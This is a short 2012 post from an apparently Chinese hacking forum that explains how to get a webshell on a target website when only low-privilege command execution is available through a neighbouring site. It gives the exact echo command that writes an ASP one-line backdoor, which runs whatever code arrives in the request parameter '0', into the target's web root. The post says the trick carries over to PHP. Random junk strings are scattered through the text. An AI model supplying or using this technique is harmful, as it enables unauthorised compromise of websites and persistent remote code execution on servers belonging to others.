找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1983|回复: 0
打印 上一主题 下一主题

旁注cmd低权限下拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:40:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
# c5 c  ~! p& m8 }% I6 H$ A6 |/ {6 k' V2 x8 p9 a* Z$ q
命令格式# h  ~1 `3 N7 p& n
; ~8 A- [7 n9 A; [4 f9 Y9 F
Echo 语句 >目标站绝对目录7 j6 n2 o' p3 B3 S9 h, F) D

! v3 ]6 p# r5 b2 `/ ?5 C7 D例如:
! d- U. c7 ~# G% a8 ~# n, F: e4 A* p# O! X
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
( V# @) M7 k# t1 Z7 @$ h; p' }$ n8 a7 J0 C
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
, T8 W1 o+ X# c" U
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表